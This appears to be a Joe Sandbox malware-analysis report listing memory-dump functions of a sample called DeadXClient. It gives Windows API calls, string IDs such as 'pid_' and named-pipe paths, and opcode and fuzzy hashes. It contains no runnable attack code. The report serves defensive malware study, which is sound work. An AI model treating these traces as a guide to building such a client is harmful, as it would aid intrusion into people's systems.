• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
• Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
• Instruction ID: ad41b33d2cff7823a7cc60bb4f893933781ad136e9dea914405270e99ba85495
• Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
• Instruction Fuzzy Hash: 6A31B531313BC2D1EF05AB47A800B9AA3A8F748BA4F5A0A65DD2D0B750EF38D085C350
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
• Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
• Instruction ID: bafa810a638c472e6294e201ea1659b20b748359e5c3750c6a262662ac4433d6
• Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
• Instruction Fuzzy Hash: AA116A31320F8086F7108B53E848B5AB6A1F788FE8F004325EA5E877A4DF78D484C744
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
• Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: Dead
• API String ID: 756756679-1293411866
• Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
• Instruction ID: 8d5d3840d2ee0794494d523c6ac463ac605abc53125fa820678c6a09babfc924
• Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
• Instruction Fuzzy Hash: 9E31BC32702B51C3EB05DF96E8447AAA761FB54F84F149264DF8907B26EF38E0A68710
APIs
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
• Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
• Instruction ID: e84dfc3b32cb20bbf400105a3cd08fc0406acf207ffcdad00dd67069a0932502
• Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
• Instruction Fuzzy Hash: 97015731344E4082EB10CB53A85879AA2A6F788FC8F548235DE8A43719DF7CD58AC750
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
• Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
• Instruction ID: 58d313475246d29930ef77139524b1af55824e2ee5b595136afb7503d95cd6db
• Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
• Instruction Fuzzy Hash: 8CF06272348A8192FB208F66F89479AA721F754BC8F809125DA4947959DFBCD68DCB00
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
• Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
• Instruction ID: a62737a03a1c29e391349a5a7dc52a72e79846251ae13e3abb6830c74525cb83
• Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
• Instruction Fuzzy Hash: 60F0A071722F0081FF088FA2F888BA92761FB88F44F842619940B47266DF7CD0C8C320
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1C595576
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 1C5A09C2
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C5A093F,?,?,?,1C59E263), ref: 1C5A0A80
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C5A093F,?,?,?,1C59E263), ref: 1C5A0B0A
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
Similarity
• API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
• String ID:
• API String ID: 2210144848-0
APIs
• StrCmpNW.SHLWAPI ref: 1C59357A
• StrStrW.SHLWAPI ref: 1C593594
• StrToIntW.SHLWAPI ref: 1C5935BB
  • Part of subcall function 1C591934: OpenProcess.KERNEL32 ref: 1C59195A
  • Part of subcall function 1C591934: K32GetModuleFileNameExW.KERNEL32 ref: 1C591978
  • Part of subcall function 1C591934: PathFindFileNameW.SHLWAPI ref: 1C591987
  • Part of subcall function 1C591934: lstrlenW.KERNEL32 ref: 1C591993
  • Part of subcall function 1C591934: StrCpyW.SHLWAPI ref: 1C5919A6
  • Part of subcall function 1C591934: CloseHandle.KERNEL32 ref: 1C5919B4
  • Part of subcall function 1C593C70: StrCmpNIW.SHLWAPI(?,?,?,1C59255A), ref: 1C593C88
Strings
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID: pid_
• API String ID: 517849248-4147670505
APIs
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
Similarity
• API ID: Heap$Process$Free
• String ID:
• API String ID: 3168794593-0
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
APIs
• RtlPcToFileHeader.NTDLL ref: 1C599634
• RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,1C5984FB), ref: 1C59967A
Strings
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 756756679-0
                                                                                                                                                                                  • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                                                                                                                                                  • Instruction ID: 9691abdf26db390cf31098e4d9ab15b4dbc43e1bf176a915a7ebc1092be1370e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                                                                                                                                                  • Instruction Fuzzy Hash: AD11A572A55F9081EB05CBA6A40429AB7A1FBC8FA4F594324DE99537A4EF78D082C740
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                                                                  • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                                                                                                                                                  • Instruction ID: d8ef271a099474a01fe52cf671dd993ac43e6c623026be89aaa9410bf9323068
                                                                                                                                                                                  • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FE065B1A41A0086F7088FA3D80C78977E2FB88F09F08C124C90907361DFBDD4D98B80
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                                                                  • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                                                                                                                                                  • Instruction ID: 60b1dcc383803c18ca8a10a4c7ef50cea8e72fd45820bea60f8379b7bc945cb7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8BE01AB1651A4087F7089F63D80879977E2FB8CF19F488124C90907321EE7CE4D9CB10